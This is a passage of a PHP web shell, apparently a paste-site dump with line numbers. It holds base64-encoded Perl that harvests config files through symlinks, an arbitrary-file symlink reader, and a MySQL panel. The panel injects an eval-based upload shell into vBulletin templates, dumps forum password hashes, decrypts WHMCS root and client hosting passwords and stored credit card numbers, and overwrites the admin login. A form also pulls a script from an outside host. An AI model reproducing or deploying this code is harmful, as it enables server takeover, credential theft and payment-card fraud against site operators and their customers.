NCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";
  895.  
  896. $write = fwrite ($f2 ,base64_decode($sml_perl));
  897.  
  898. if ($write)
  899. {
  900.  
  901. @chmod('sa2/perl.pl',0755);
  902.  
  903.  
  904. }
  905.  
  906. echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
  907. }
  908.  
  909.  
  910. break;
  911.  
  912.  
  913. }
  914. /// home ///
  915. }
  916. }
  917. else
  918. {
  919.  
  920. echo '
  921. The file path to symlink
  922.  
  923. <br /><br />
  924. <form method="post">
  925. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  926. <input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
  927. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  928.  
  929.  
  930.  
  931. </form>
  932. ';
  933.  
  934.  
  935. $pfile = $_POST['file'];
  936. $symfile = $_POST['symfile'];
  937. $symlink = $_POST['symlink'];
  938.  
  939. if ($symlink)
  940. {
  941.  
  942. @symlink("$pfile","sym/$symfile");
  943.  
  944. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
  945. exit;
  946. }else {exit;}
  947.  
  948.  
  949.  
  950.  
  951. }
  952.  
  953.  
  954.  
  955. break;
  956.  
  957.  
  958.  
  959. //////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////
  960.  
  961.  
  962. case 'ms':
  963.  
  964.  
  965.  
  966.  
  967. $host = $_POST['host'];
  968. $user = $_POST['user'];
  969. $pass = $_POST['pass'];
  970. $db = $_POST['db'];
  971.  
  972.  
  973.  
  974.  
  975.  
  976.  
  977. ////////////////// HEEEEEEEEEEEEERE /////////////////////////////////////////////// HEEEEEEEEEEEEERE /////////////////////////////
  978.  
  979. if ($_GET['show'] == 'tb'){
  980.  
  981. $host_c = $_COOKIE['host_mysql'];
  982. $user_c = $_COOKIE['user_mysql'];
  983. $pass_c = $_COOKIE['pass_mysql'];
  984. $db_c = $_COOKIE['db_mysql'];
  985.  
  986.  
  987. $con = @mysql_connect($host_c,$user_c,$pass_c);
  988. $sel = @mysql_select_db($db_c);
  989.  
  990.  
  991. if(!$sel){ echo "mysql connect error" ; exit;}
  992.  
  993. $dbname = $db_c;
  994.  
  995. $pTable = mysql_list_tables( $dbname ) ;
  996.  
  997. $num = mysql_num_rows( $pTable );
  998.  
  999. echo "<div class='tmp'>
  1000. <table align='center' width='40%'><td> Tables </td><td> Rows </td>";
  1001.  
  1002. for( $i = 0; $i < $num; $i++ ) {
  1003.  
  1004.  
  1005. $tablename = mysql_tablename( $pTable, $i );
  1006.  
  1007. $sq3l=mysql_query("select * from $tablename");
  1008.  
  1009. $c3t=mysql_num_rows($sq3l);
  1010.  
  1011. echo "
  1012.  
  1013. <tr>
  1014.  
  1015. <td>
  1016. <div class='dom'><a href='$pg?sws=ms&show=cl&tb=$tablename' />".$tablename." </a> </div>
  1017. </td>
  1018.  
  1019.  
  1020. <td>
  1021. ".$c3t."
  1022. </td>
  1023.  
  1024. </tr>
  1025.  
  1026. ";
  1027.  
  1028.  
  1029.  
  1030.  
  1031. if ($tablename == 'template') { $secript = 'vb'; }
  1032.  
  1033. else if ($tablename == 'wp_post') {$secript = 'wp';}
  1034.  
  1035. else if ($tablename == 'jos_users') {$secript = 'jm';}
  1036.  
  1037. else if ($tablename == 'tbladmins') {$secript = 'wh';}
  1038.  
  1039.  
  1040. }
  1041.  
  1042.  
  1043. if ($secript == 'vb')
  1044.  
  1045. {
  1046.  
  1047.  
  1048. echo '<div class="cont">
  1049. <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
  1050. <br /> <br /> <b>
  1051. [ <a href="?sws=ms&op=in"> Update Index </a>]
  1052.  
  1053. [<a href="?sws=ms&op=sh"> Inject shell</a>]
  1054.  
  1055. [ <a href="?sws=ms&op=shm" >Show members Information</a>]
  1056. ';
  1057.  
  1058.  
  1059. }
  1060.  
  1061.  
  1062.  
  1063. else if ($secript == 'wp')
  1064. {
  1065.  
  1066.  
  1067. echo '
  1068. <div class="cont">
  1069. <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Wordpress </b><div>
  1070. <br /> <br /> <b>
  1071. [ <a href="?sws=ms&op=awp"> Change admin </a>]
  1072.  
  1073. [ <a href="?sws=ms&op=shwp" >Show members</a>]';
  1074.  
  1075.  
  1076. }
  1077.  
  1078.  
  1079. else if ($secript == 'wh'){
  1080.  
  1081. echo '
  1082. <div class="cont">
  1083. <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
  1084. <br /> <br /> <b>
  1085. [ <a href="?sws=ms&op=hroot">roots</a>]
  1086. [ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
  1087. [ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
  1088. [ <a href="?sws=ms&op=trak" >tickets</a>]
  1089. [ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
  1090. [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
  1091. [ <a href="?sws=ms&op=cadmin"> Change admin </a>]';
  1092.  
  1093.  
  1094. }
  1095. else{echo '<div class="cont"> ';}
  1096.  
  1097.  
  1098. /////////////// cmd ////////////////////////////////
  1099. echo "<br /><br />
  1100.  
  1101. [ <a href='?sws=ms&op=bkup'> baukup </a>]
  1102. [ <a href='?sws=ms&op=css'> Inject css </a>]
  1103. <br /><br />
  1104. <form method='post'>
  1105. <textarea rows=\"3\" name=\"sql\">Cmd sql</textarea> <br /><br />
  1106. <input type=\"submit\" value=\"SQL\" name='cmd'/>
  1107. </form>
  1108. <br /><br />
  1109. <a style=\" float: right\" href=\"?sws=ms&op=out\" >[ Logout ]</a>";
  1110.  
  1111. if (isset($_POST['cmd']))
  1112. {
  1113.  
  1114. $sql = $_POST['sql'];
  1115.  
  1116. $query =@mysql_query($sql,$con) or die;
  1117.  
  1118. if ($query){echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">CMD sql successfully </div> </center>";} elseif(!$query) {echo "<br /><br /><center><br /><div style=\"color: red; font-weight: bold\">CMD sql error </div> </center>";}
  1119.  
  1120.  
  1121. }
  1122.  
  1123. exit;
  1124.  
  1125.  
  1126. }
  1127.  
  1128. ///////////////////// show cl ///////////////
  1129. else if ($_GET['show'] == 'cl')
  1130.  
  1131. {
  1132.  
  1133.  
  1134.  
  1135.  
  1136.  
  1137. $host_c = $_COOKIE['host_mysql'];
  1138. $user_c = $_COOKIE['user_mysql'];
  1139. $pass_c = $_COOKIE['pass_mysql'];
  1140. $db_c = $_COOKIE['db_mysql'];
  1141.  
  1142.  
  1143. $con = @mysql_connect($host_c,$user_c,$pass_c);
  1144. $sel = @mysql_select_db($db_c);
  1145.  
  1146. $tb = $_GET['tb'];
  1147.  
  1148. $col_sws = mysql_query("SHOW COLUMNS FROM $tb");
  1149.  
  1150. $num2 = mysql_num_rows( $col_sws );
  1151. echo "<div class='tmp'> <table align='center'><td>Columns Name</td><td>Content</td>";
  1152. for( $i2 = 0; $i2 < $num2; $i2++ ){
  1153.  
  1154. $col = mysql_fetch_row($col_sws) ;
  1155. $um_sws = $col[0];
  1156.  
  1157. echo "<tr><td>$um_sws&nbsp;</td>" ;
  1158.  
  1159.  
  1160. $tit = mysql_query ("SELECT * FROM $tb" );
  1161. while ($row = mysql_fetch_assoc($tit))
  1162. {
  1163.  
  1164. $cont = $row[$um_sws] ;
  1165.  
  1166. echo "<td>$cont</td></tr>" ;
  1167.  
  1168.  
  1169. }
  1170.  
  1171. ;
  1172.  
  1173.  
  1174. }
  1175.  
  1176.  
  1177.  
  1178.  
  1179. exit;
  1180.  
  1181.  
  1182. }
  1183.  
  1184.  
  1185.  
  1186.  
  1187.  
  1188.  
  1189.  
  1190.  
  1191.  
  1192. if (isset($_COOKIE['host_mysql'])){
  1193.  
  1194. if (!isset($_GET['op'])){
  1195.  
  1196. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
  1197.  
  1198.  
  1199. exit;
  1200. }
  1201.  
  1202.  
  1203. }
  1204.  
  1205.  
  1206.  
  1207.  
  1208.  
  1209. else if (!isset($_COOKIE['host_mysql']))
  1210.  
  1211. {
  1212.  
  1213.  
  1214. if (!isset($host))
  1215. {
  1216.  
  1217.  
  1218. echo '
  1219.  
  1220. <div >
  1221.  
  1222. <br /><br /><br />
  1223. <pre><form method="POST">
  1224. host :<input type="text" name="host" /><br />
  1225. user :<input type="text" name="user" /><br />
  1226. pass :<input type="text" name="pass" /><br />
  1227. db :<input type="text" name="db" /><br />
  1228. <input type="submit" name="login" value="login .." />
  1229. </form></pre>';
  1230. exit;}
  1231. else
  1232. {
  1233.  
  1234. $host = $_POST['host'];
  1235. $user = $_POST['user'];
  1236. $pass = $_POST['pass'];
  1237. $db = $_POST['db'];
  1238.  
  1239.  
  1240. $con = @mysql_connect($host,$user,$pass) ;
  1241.  
  1242. $sel = @mysql_select_db($db,$con);
  1243.  
  1244. if (!$sel)
  1245. {
  1246.  
  1247. echo " MYSQL INFOTMATI NOT TREY ";
  1248.  
  1249.  
  1250. }
  1251.  
  1252. else
  1253. {
  1254.  
  1255.  
  1256.  
  1257. setcookie( "host_mysql", $host);
  1258. setcookie( "user_mysql", $user);
  1259. setcookie( "pass_mysql", $pass);
  1260. setcookie( "db_mysql", $db);
  1261. ob_end_flush();
  1262.  
  1263. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
  1264. exit;
  1265.  
  1266.  
  1267.  
  1268.  
  1269.  
  1270. }}}
  1271.  
  1272.  
  1273.  
  1274.  
  1275. /////////////////////////////////// Options /////////////////////////////////////////
  1276.  
  1277. if (isset($_GET['op']))
  1278. {
  1279.  
  1280. $op = $_GET['op'];
  1281.  
  1282. $host_c = $_COOKIE['host_mysql'];
  1283. $user_c = $_COOKIE['user_mysql'];
  1284. $pass_c = $_COOKIE['pass_mysql'];
  1285. $db_c = $_COOKIE['db_mysql'];
  1286.  
  1287. $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;
  1288. $sedb3 =@mysql_select_db($db_c,$con3) or die;
  1289. if (!$sedb3){echo "error in mysql connect "; exit;}
  1290.  
  1291.  
  1292. /////// index vb ////////
  1293.  
  1294. if ($op == 'in')
  1295. {
  1296.  
  1297. if (!isset($index)){
  1298.  
  1299. echo '
  1300. Your index : <br /><br />
  1301. <form method="post">
  1302.  
  1303. <textarea rows="7" name="index" cols="40"></textarea>
  1304.  
  1305. <br /><br />
  1306. <input type="submit" value="Update Index" maxlength="30" name="sql" />
  1307. </form> ';
  1308. }
  1309. else if ($_POST['sql'])
  1310. {
  1311.  
  1312.  
  1313. $index =$_POST['index'];
  1314.  
  1315. $index=str_replace("\'","'",$index);
  1316. $crypt = "{\${eval(base64_decode(\'";
  1317. $crypt .= base64_encode("echo \"$index\";");
  1318. $crypt .= "\'))}}{\${exit()}}</textarea>";
  1319. $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
  1320. $query =@ mysql_query($sqlindex);
  1321.  
  1322. if ($query)
  1323. {
  1324. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated Index successfully </div> </center>";
  1325. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1326. exit;
  1327. }
  1328. else if (!$query)
  1329. {
  1330. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated Index erorr </div> </center>";
  1331. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1332. exit;
  1333.  
  1334. }
  1335.  
  1336.  
  1337.  
  1338.  
  1339. }
  1340.  
  1341.  
  1342.  
  1343.  
  1344.  
  1345.  
  1346.  
  1347.  
  1348.  
  1349.  
  1350. }
  1351. /////// shelllll ///////////
  1352. else if($op == 'sh')
  1353.  
  1354. {
  1355.  
  1356.  
  1357.  
  1358. if (!isset($_POST['ch']))
  1359. {
  1360.  
  1361.  
  1362. echo '
  1363. <br /><br /><br />
  1364. <form method="post">
  1365. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  1366. <select name="ch">
  1367. <option value="faq">Inject shell in faq </option>
  1368. <option value="cal">Inject shell in calendar </option>
  1369. <option value="sea">Inject shell in search </option>
  1370. </select>
  1371. <br /><br /><br />
  1372. <input type="submit" name="sql" value="Inject shell" />
  1373. </form>
  1374.  
  1375.  
  1376.  
  1377. ';
  1378.  
  1379. } if (isset($_POST['sql'])){
  1380.  
  1381. $ch = $_POST['ch'];
  1382. $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;
  1383. $crypt = "{\${eval(base64_decode(\'";
  1384. $crypt .= "$shell";
  1385. $crypt .= "\'))}}{\${exit()}}</textarea>";
  1386.  
  1387.  
  1388.  
  1389.  
  1390. if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";}
  1391.  
  1392. elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";}
  1393.  
  1394. elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";}
  1395.  
  1396.  
  1397. $query =@ mysql_query($sqlfaq);
  1398.  
  1399. if ($query)
  1400. {
  1401. echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been successfully</div> </center>";
  1402. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1403. exit;
  1404. }
  1405. else if (!$query)
  1406. {
  1407. echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been erorr !</div> </center>";
  1408. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1409. exit;
  1410.  
  1411. }
  1412.  
  1413.  
  1414. }
  1415.  
  1416.  
  1417.  
  1418.  
  1419.  
  1420.  
  1421.  
  1422.  
  1423.  
  1424. }
  1425. else if ($op == 'shm')
  1426. {
  1427.  
  1428.  
  1429.  
  1430.  
  1431.  
  1432. $sql = 'select * from `user`';
  1433. $query =@ mysql_query($sql);
  1434.  
  1435. if ($query)
  1436. {
  1437.  
  1438. while ($row = mysql_fetch_assoc($query))
  1439. {
  1440.  
  1441. echo "
  1442. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
  1443. <tr>
  1444. <td>ID :</td>
  1445. <td>user :</td>
  1446. <td>pass :</td>
  1447. <td>salt :</td>
  1448. <td>email :</td>
  1449.  
  1450. </tr>
  1451.  
  1452. <tr>
  1453. <td>".$row['userid']."</td>
  1454. <td>".$row['username']."</td>
  1455. <td>".$row['password']."</td>
  1456. <td>".$row['salt']."</td>
  1457. <td>".$row['email']."</td>
  1458. </tr>
  1459.  
  1460. </table>
  1461.  
  1462. ";
  1463.  
  1464.  
  1465.  
  1466.  
  1467.  
  1468. }}
  1469.  
  1470. }
  1471. else if ($op == 'out')
  1472. {
  1473.  
  1474. setcookie( "host_mysql", $host,time()-3600);
  1475. setcookie( "user_mysql", $user,time()-3600);
  1476. setcookie( "pass_mysql", $pass,time()-3600);
  1477. setcookie( "db_mysql", $db,time()-3600);
  1478. ob_end_flush();
  1479.  
  1480.  
  1481. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms\" /> ";
  1482. exit;
  1483.  
  1484.  
  1485.  
  1486. }
  1487.  
  1488. ///////////////////////////////// whmcs ////////////////////////////////////////
  1489.  
  1490.  
  1491. else if ($op == 'hroot')
  1492. {
  1493.  
  1494.  
  1495.  
  1496.  
  1497.  
  1498.  
  1499. if (isset($_POST['viw']))
  1500. {
  1501.  
  1502. $hash = $_POST['hash'] ;
  1503.  
  1504.  
  1505. $query = mysql_query("SELECT * FROM tblservers");
  1506.  
  1507. echo "<div class='tmp'><table cellpadding='5' align='center'>
  1508. hosting roots
  1509. <tr><td>Type</td><td>noc</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
  1510.  
  1511. while($row = mysql_fetch_array($query)) {
  1512.  
  1513. echo "<tr>
  1514. <td>{$row['type']}</td><td>{$row['noc']}</td><td>{$row['active']}</td><td>{$row['ipaddress']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
  1515.  
  1516. </tr>";
  1517. }
  1518. echo "</table>";
  1519.  
  1520.  
  1521. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'");
  1522. echo "<table cellpadding='5' align='center'>
  1523. <br /><br />
  1524. Clients roots
  1525. <tr><td>IP Address</td><td>username</td><td>Password</td></tr>";
  1526.  
  1527. while($row = mysql_fetch_array($query)) {
  1528.  
  1529. echo "<tr>
  1530. <td>{$row['dedicatedip']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
  1531.  
  1532. </tr>";
  1533. }
  1534. echo "</table></div>";
  1535. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1536. exit;
  1537.  
  1538.  
  1539. }
  1540. else
  1541. {
  1542.  
  1543. echo'<form method="post">
  1544. <br /><br />
  1545. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
  1546. <input type="submit" name="viw" value="show" />
  1547.  
  1548. </form>';
  1549. exit;
  1550.  
  1551.  
  1552.  
  1553.  
  1554.  
  1555. }
  1556.  
  1557.  
  1558. }
  1559.  
  1560.  
  1561. //////////// domine ////////////
  1562.  
  1563. else if ($op == 'scard')
  1564.  
  1565. {
  1566.  
  1567. if (isset($_POST['viw']))
  1568. {
  1569.  
  1570. $hash = $_POST['hash'] ;
  1571.  
  1572.  
  1573. $query = mysql_query('select * from `tblclients`') ;
  1574. echo "<div class='tmp'><table cellpadding='5' align='center'> ";
  1575. while($v = mysql_fetch_array($query)) {
  1576. echo "
  1577. <tr><td>cardtype</td>
  1578. <td>id</td>
  1579. <td>firstname</td>
  1580. <td>lastname</td>
  1581. <td>email</td>
  1582. <td>city</td>
  1583. <td>ciuntry</td>
  1584. <td>address1</td>
  1585. <td>lastlogin</td>
  1586. <td>phonenumber</td>
  1587. <td>datecreated</td>
  1588. <td>cardnum</td>
  1589. <td>startdate</td>
  1590. <td>expdate</td>
  1591. </tr>";
  1592. echo "<tr>
  1593.  
  1594. <td>{$v['cardtype']}</td>
  1595. <td>{$v['id']}</td>
  1596. <td>{$v['firstname']}</td>
  1597. <td>{$v['lastname']}</td>
  1598. <td>{$v['email']}</td>
  1599. <td>{$v['city']}</td>
  1600. <td>{$v['ciuntry']}</td>
  1601. <td>{$v['address1']}</td>
  1602. <td>{$v['lastlogin']}</td>
  1603. <td>{$v['phonenumber']}</td>
  1604. <td>{$v['datecreated']}</td>
  1605. <td>".decrypt ($v['cardnum'], $hash)."</td>
  1606. <td>".decrypt ($v['startdate'], $hash)."</td>
  1607. <td>".decrypt ($v['expdate'], $hash)."</td>
  1608. </tr></div></table>";
  1609. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1610. exit;
  1611.  
  1612. }
  1613. }else
  1614. {
  1615.  
  1616. echo'<form method="post">
  1617. <br /><br />
  1618. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
  1619. <input type="submit" name="viw" value="show" />
  1620.  
  1621. </form>';
  1622. exit;
  1623.  
  1624.  
  1625.  
  1626.  
  1627.  
  1628. }
  1629.  
  1630.  
  1631.  
  1632.  
  1633.  
  1634.  
  1635.  
  1636. }
  1637.  
  1638. else if ($op == 'chost')
  1639.  
  1640. {
  1641.  
  1642.  
  1643.  
  1644. if (isset($_POST['viw']))
  1645. {
  1646.  
  1647. $hash = $_POST['hash'] ;
  1648.  
  1649. $query = mysql_query("SELECT * FROM tblhosting");
  1650. echo "<div class='tmp'><table cellpadding='5' align='center'>
  1651. <tr><td>domain</td><td>Username</td><td>Pass</td><td>IP Address</td></tr>";
  1652. while($r = mysql_fetch_array($query)) {
  1653. echo "<tr><td>{$r['domain']}</td><td>{$r['username']}</td>
  1654. <td>".decrypt ($r['password'], $hash)."</td><td>{$r['dedicatedip']}</td></tr>";
  1655. }
  1656. echo "</table></div>";
  1657. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1658.  
  1659. exit;
  1660.  
  1661.  
  1662.  
  1663. }
  1664. else
  1665. {
  1666.  
  1667. echo'<form method="post">
  1668. <br /><br />
  1669. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
  1670. <input type="submit" name="viw" value="show" />
  1671.  
  1672. </form>';
  1673. exit;
  1674.  
  1675.  
  1676.  
  1677.  
  1678.  
  1679. }
  1680.  
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686.  
  1687. }
  1688.  
  1689.  
  1690.  
  1691. else if ($op == 'cadmin')
  1692.  
  1693. {
  1694.  
  1695.  
  1696.  
  1697. if (isset($_POST['viw']))
  1698. {
  1699.  
  1700. $pass = md5($_POST['pass']);
  1701. $user = $_POST['user'];
  1702.  
  1703.  
  1704.  
  1705. $query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1");
  1706. $query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1");
  1707.  
  1708. if ($query)
  1709. {
  1710. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated admin successfully </div> </center>";
  1711. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1712.  
  1713. exit;
  1714. }
  1715.  
  1716. else if (!$query)
  1717. {
  1718. echo "<center><br /><div style=\"color: red; font-weight: bold\">Updated admin erorr </div> </center>";
  1719. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1720.  
  1721. exit;
  1722.  
  1723. }
  1724.  
  1725.  
  1726.  
  1727.  
  1728.  
  1729.  
  1730.  
  1731. }
  1732. else
  1733. {
  1734.  
  1735. echo'<form method="post">
  1736. <br /><br />
  1737. user : <input type="text" name="user" /><br /><br />
  1738. pass : <input type="text" name="pass" /><br /><br />
  1739. <input type="submit" name="viw" value="update" />
  1740.  
  1741. </form>';
  1742.  
  1743.  
  1744. exit;
  1745.  
  1746.  
  1747.  
  1748.  
  1749.  
  1750. }
  1751. }
  1752.  
  1753.  
  1754.  
  1755. else if ($op == 'trak')
  1756.  
  1757. {
  1758.  
  1759. $page = $_GET['page'];
  1760. $numpr = 30;
  1761. if(!$page){$page = 0;}
  1762. $sql0 = mysql_query("Select * from tbltickets");
  1763. $num_r0s = mysql_num_rows($sql0);
  1764.  
  1765.  
  1766. $sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");
  1767.  
  1768. $ap = 1;
  1769. echo "<br /><br /><div>Page : ";
  1770. for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
  1771. {
  1772.  
  1773. if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1774. else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
  1775.  
  1776.  
  1777. $ap ++;
  1778.  
  1779. }
  1780.  
  1781. echo "</div><br />";
  1782.  
  1783.  
  1784. while ($r3o = mysql_fetch_assoc($sql))
  1785. {
  1786.  
  1787. $email = $r3o['email'];
  1788. $date = $r3o['date'];
  1789. $title = $r3o['title'];
  1790. $message = $r3o['message'];
  1791. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
  1792.  
  1793. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
  1794. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
  1795. echo "</table></div>";
  1796. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
  1797. exit;
  1798.  
  1799.  
  1800.  
  1801. }
  1802.  
  1803. }
  1804.  
  1805.  
  1806. else if ($op == 'rtrak')
  1807.  
  1808. {
  1809.  
  1810. $page = $_GET['page'];
  1811. $numpr = 25;
  1812. if(!$page){$page = 0;}
  1813. $sql0 = mysql_query("Select * from tblticketreplies");
  1814. $num_r0s = mysql_num_rows($sql0);
  1815.  
  1816.  
  1817. $sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");
  1818.  
  1819. $ap = 1;
  1820. echo "<br /><br /><div>Page : ";
  1821. for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
  1822. {
  1823.  
